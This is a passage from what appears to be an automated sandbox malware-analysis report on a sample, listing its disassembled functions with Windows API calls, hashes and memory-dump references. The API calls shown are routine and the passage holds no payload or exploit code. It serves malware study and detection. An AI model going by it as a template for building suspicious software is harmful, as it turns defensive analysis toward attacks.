                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FB7D0B
                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00FB7D2A
                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00FB7D42
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F9B7AD,00000000), ref: 00FB7D6B
                                                        • Part of subcall function 00F39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F39BB2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$Long
                                                      • String ID:
                                                      • API String ID: 847901565-0
                                                      • Opcode ID: c89792aa1e8fcb7053ee829c8f5590188ae8e9b49792aed6e52e231a28ade5e2
                                                      • Instruction ID: 48d2078aee1f628a25c6957604388e9f4d39b7e4d310ff2ea864cc609514ecc9
                                                      • Opcode Fuzzy Hash: c89792aa1e8fcb7053ee829c8f5590188ae8e9b49792aed6e52e231a28ade5e2
                                                      • Instruction Fuzzy Hash: 981163315056199FCB10AF29CC44AB63BA5BF893B0B154724F839D71F0D7319951EF90
                                                      Function 00FB5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 00FB56BB
                                                      • _wcslen.LIBCMT ref: 00FB56CD
                                                      • _wcslen.LIBCMT ref: 00FB56D8
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00FB5816
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend_wcslen
                                                      • String ID:
                                                      • API String ID: 455545452-0
                                                      • Opcode ID: 1a5e96b03757ba2e3733a9c49d35abed30bdab4b6d97a58b04bdc8148d36e950
                                                      • Instruction ID: afb16c972385f7c3d1174a11b86d7538895f32851ca06de03f376063335edc1b
                                                      • Opcode Fuzzy Hash: 1a5e96b03757ba2e3733a9c49d35abed30bdab4b6d97a58b04bdc8148d36e950
                                                      • Instruction Fuzzy Hash: 3311B471A00608EADF20DF62CC85BEE776CEF10B74B104126F915D6081EB78D980EF60
                                                      Function 00F3990F Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetTextColor.GDI32(?,?), ref: 00F398D6
                                                      • SetBkMode.GDI32(?,00000001), ref: 00F398E9
                                                      • GetStockObject.GDI32(00000005), ref: 00F398F1
                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00F39952
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ColorLongModeObjectStockTextWindow
                                                      • String ID:
                                                      • API String ID: 2960364272-0
                                                      • Opcode ID: 05cfdca4f01a78ff82ce2dee15ffcb090ec5b32507cd8f25fff6ad6f24a0649f
                                                      • Instruction ID: 783a9999aa37bc21055c4a76904450a7a635610b986779515dc6fb29fa34ae92
                                                      • Opcode Fuzzy Hash: 05cfdca4f01a78ff82ce2dee15ffcb090ec5b32507cd8f25fff6ad6f24a0649f
                                                      • Instruction Fuzzy Hash: 6A21E43294E2409FD7124F64DC55BEA3B64AF53330F19019EE9828A162D7F14941FBA0
                                                      Function 00F81A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00F81A47
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F81A59
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F81A6F
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F81A8A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: ad4fdbe600827a75455c933cb379979198692a46a840338a90f22c048f8f2667
                                                      • Instruction ID: 6b14e8f6231b53ed44b4cdd9fb89e2593b04b9da1555b6af7b22da3f186fbfc5
                                                      • Opcode Fuzzy Hash: ad4fdbe600827a75455c933cb379979198692a46a840338a90f22c048f8f2667
                                                      • Instruction Fuzzy Hash: 0111273AD01219FFEB10ABA4CD85FEDBB78FB08750F200191EA14B7290D6716E51EB94
                                                      Function 00F8E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00F8E1FD
                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00F8E230
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F8E246
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F8E24D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                      • String ID:
                                                      • API String ID: 2880819207-0
                                                      • Opcode ID: 668c99226f04365db91acef6ba11ef2dff27df4226e3fd30d4b5fa0ed2c0740b
                                                      • Instruction ID: d25a09ce5a9912f7160d6ecb4d556128b0b50c6f146f480c0c7f6ae7b94c5d1b
                                                      • Opcode Fuzzy Hash: 668c99226f04365db91acef6ba11ef2dff27df4226e3fd30d4b5fa0ed2c0740b
                                                      • Instruction Fuzzy Hash: 4211C476D0425CBBD701AFA89C49AEF7FADAF45320F144365F924E3291D6B0C904ABA0
                                                      Function 00F4D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateThread.KERNEL32(00000000,?,00F4CFF9,00000000,00000004,00000000), ref: 00F4D218
                                                      • GetLastError.KERNEL32 ref: 00F4D224
                                                      • __dosmaperr.LIBCMT ref: 00F4D22B
                                                      • ResumeThread.KERNEL32(00000000), ref: 00F4D249
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                      • String ID:
                                                      • API String ID: 173952441-0
                                                      • Opcode ID: b3183c98dcb500aa25ebd1c7d7a0e82056c16008e907604910fdd21c9d8e62e5
                                                      • Instruction ID: f11ca7ddaff766ddd626eb0f549c956a3344848d406f96321f4e361e73d60991
                                                      • Opcode Fuzzy Hash: b3183c98dcb500aa25ebd1c7d7a0e82056c16008e907604910fdd21c9d8e62e5
                                                      • Instruction Fuzzy Hash: DB01D236805218BBDB115BA5DC49BAF7EA9DF81331F100319FD25921D0DBB4CA45E6A0
                                                      Function 00F2600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F2604C
                                                      • GetStockObject.GDI32(00000011), ref: 00F26060
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F2606A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CreateMessageObjectSendStockWindow
                                                      • String ID:
                                                      • API String ID: 3970641297-0
                                                      • Opcode ID: cd362b51e512f44e39abda874ec22ff0c8b501fc4f0494450797ad55e1323f35
                                                      • Instruction ID: 3f877f0bfeb0e3dcd05419e2b51d0e0ce7f86123fbbbf1edaf3a955d2f5dc185
                                                      • Opcode Fuzzy Hash: cd362b51e512f44e39abda874ec22ff0c8b501fc4f0494450797ad55e1323f35
                                                      • Instruction Fuzzy Hash: 92115B72501558BFEF129FA4AC84EEBBB69EF193A4F040215FA1496110D732DC60FFA1
                                                      Function 00F43B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00F43B56
                                                        • Part of subcall function 00F43AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00F43AD2
                                                        • Part of subcall function 00F43AA3: ___AdjustPointer.LIBCMT ref: 00F43AED
                                                      • _UnwindNestedFrames.LIBCMT ref: 00F43B6B
                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00F43B7C
                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00F43BA4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                      • String ID:
                                                      • API String ID: 737400349-0
                                                      • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                      • Instruction ID: 27aa185f84cd35d22f4e1bc42b978c21b6b1b4c3511c56f4b341fadd58947a7b
                                                      • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                      • Instruction Fuzzy Hash: DC010C32500149BBDF126E95CC46EEB7F6DFF98768F044114FE48A6121C736E961EBA0
                                                      Function 00F53073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00F213C6,00000000,00000000,?,00F5301A,00F213C6,00000000,00000000,00000000,?,00F5328B,00000006,FlsSetValue), ref: 00F530A5
                                                      • GetLastError.KERNEL32(?,00F5301A,00F213C6,00000000,00000000,00000000,?,00F5328B,00000006,FlsSetValue,00FC2290,FlsSetValue,00000000,00000364,?,00F52E46), ref: 00F530B1
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F5301A,00F213C6,00000000,00000000,00000000,?,00F5328B,00000006,FlsSetValue,00FC2290,FlsSetValue,00000000), ref: 00F530BF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID:
                                                      • API String ID: 3177248105-0
                                                      • Opcode ID: 9564506aa6e2c3c0257afdc20ea0023951396c53131a217bbbaa82e1cd0b5a5a
                                                      • Instruction ID: 324cbf5472f2e2a2cbe84178d7d43b09b6721e07948616a49aa9afb7152c0f47
                                                      • Opcode Fuzzy Hash: 9564506aa6e2c3c0257afdc20ea0023951396c53131a217bbbaa82e1cd0b5a5a
                                                      • Instruction Fuzzy Hash: 70018832711326ABCB214A7D9C84A677798AF457F6B110720FE05E71C0D721D909EAE0
                                                      Function 00F87464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00F8747F
                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00F87497
                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00F874AC
                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00F874CA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                      • String ID:
                                                      • API String ID: 1352324309-0
                                                      • Opcode ID: 8f0dabf216b4471487ca733a72a2ad35215d769f6e0e7d02a160e7734fe30b46
                                                      • Instruction ID: fc2217d7cbbf20063ac994888e365238548fbe879cb89a814cd524008c438956
                                                      • Opcode Fuzzy Hash: 8f0dabf216b4471487ca733a72a2ad35215d769f6e0e7d02a160e7734fe30b46
                                                      • Instruction Fuzzy Hash: C5118BB2209314EBE720EF54DC48BD37BFCEB00B10F208569A656D6191D7B0E904EFA0
                                                      Function 00F8B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00F8ACD3,?,00008000), ref: 00F8B0C4
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F8ACD3,?,00008000), ref: 00F8B0E9
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00F8ACD3,?,00008000), ref: 00F8B0F3
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F8ACD3,?,00008000), ref: 00F8B126
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CounterPerformanceQuerySleep
                                                      • String ID:
                                                      • API String ID: 2875609808-0
                                                      • Opcode ID: 5f015c685afd918c1ff24a275bae9c3c1cd850012470ffcd306e0c669377cb08
                                                      • Instruction ID: 5fea3ed1a0b043394d6d880ec2c63875540924840bdbe67cd5a28e7fe18a14cb
                                                      • Opcode Fuzzy Hash: 5f015c685afd918c1ff24a275bae9c3c1cd850012470ffcd306e0c669377cb08
                                                      • Instruction Fuzzy Hash: 35113931C0192CE7CF00EFA9E9986EEBB78FF09711F104186D981B6181CB305650AB91
                                                      Function 00F82DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F82DC5
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F82DD6
                                                      • GetCurrentThreadId.KERNEL32 ref: 00F82DDD
                                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00F82DE4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 2710830443-0
                                                      • Opcode ID: e48042b85af18dfc73b95d8f743ef8f93322de1cbb14984eab7c5b1e9c79b78a
                                                      • Instruction ID: ef7997edbbee103bb27cf8992d343f297b249d6e4507b70cec215b7b56fef85b
                                                      • Opcode Fuzzy Hash: e48042b85af18dfc73b95d8f743ef8f93322de1cbb14984eab7c5b1e9c79b78a
                                                      • Instruction Fuzzy Hash: B4E06D725012287BD7202B639C4DFEB3F6DEB42BA1F000215B509D10809AA09840EAF0
                                                      Function 00FB8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F39639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F39693
                                                        • Part of subcall function 00F39639: SelectObject.GDI32(?,00000000), ref: 00F396A2
                                                        • Part of subcall function 00F39639: BeginPath.GDI32(?), ref: 00F396B9
                                                        • Part of subcall function 00F39639: SelectObject.GDI32(?,00000000), ref: 00F396E2
                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00FB8887
                                                      • LineTo.GDI32(?,?,?), ref: 00FB8894
                                                      • EndPath.GDI32(?), ref: 00FB88A4
                                                      • StrokePath.GDI32(?), ref: 00FB88B2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                      • String ID:
                                                      • API String ID: 1539411459-0
                                                      • Opcode ID: e36048c44d7fe7f377f1d47b21957ff1171a2b9d4cc6c1f83b2e37cefe9f6995
                                                      • Instruction ID: c34af36843fde0a70415bcbd4b49e501801d0f71e32357f6b6d7e7b4e68e674b
                                                      • Opcode Fuzzy Hash: e36048c44d7fe7f377f1d47b21957ff1171a2b9d4cc6c1f83b2e37cefe9f6995
                                                      • Instruction Fuzzy Hash: F7F03A36045259FBDB126F94AC4AFDA3A59AF06360F048100FA11A50E1C7B55511EFE5
                                                      Function 00F398B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 00F398CC
                                                      • SetTextColor.GDI32(?,?), ref: 00F398D6
                                                      • SetBkMode.GDI32(?,00000001), ref: 00F398E9
                                                      • GetStockObject.GDI32(00000005), ref: 00F398F1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Color$ModeObjectStockText
                                                      • String ID:
                                                      • API String ID: 4037423528-0
                                                      • Opcode ID: 20336ef7dffddb41347804cdfd88262c46c64d14edeca65a49bf9449880807ef
                                                      • Instruction ID: f9bc7eafe112e39381c39428a5b581b080863adb34fec592c1f2cd4cf445879d
                                                      • Opcode Fuzzy Hash: 20336ef7dffddb41347804cdfd88262c46c64d14edeca65a49bf9449880807ef
                                                      • Instruction Fuzzy Hash: 25E06531644284AADB215B78AC49BD93F10AB11735F08C31AF6F9580E1C3714640AF11
                                                      Function 00F8162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentThread.KERNEL32 ref: 00F81634
                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00F811D9), ref: 00F8163B
                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F811D9), ref: 00F81648
                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00F811D9), ref: 00F8164F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CurrentOpenProcessThreadToken
                                                      • String ID:
                                                      • API String ID: 3974789173-0
                                                      • Opcode ID: 11ce271fd6efd8d64d71ac6e6695e57572bed14da4e7596a09ee67a0f9550f17
                                                      • Instruction ID: dfe6d420804414f7234e0c8089ec278026e7c040127a52920270d5b788bdae31
                                                      • Opcode Fuzzy Hash: 11ce271fd6efd8d64d71ac6e6695e57572bed14da4e7596a09ee67a0f9550f17
                                                      • Instruction Fuzzy Hash: 4EE08631A01215DBD7202FA09D4DBC73B7CBF447E1F184918F285C9080E6344441EFA0
                                                      Function 00F7D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 00F7D858
                                                      • GetDC.USER32(00000000), ref: 00F7D862
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F7D882
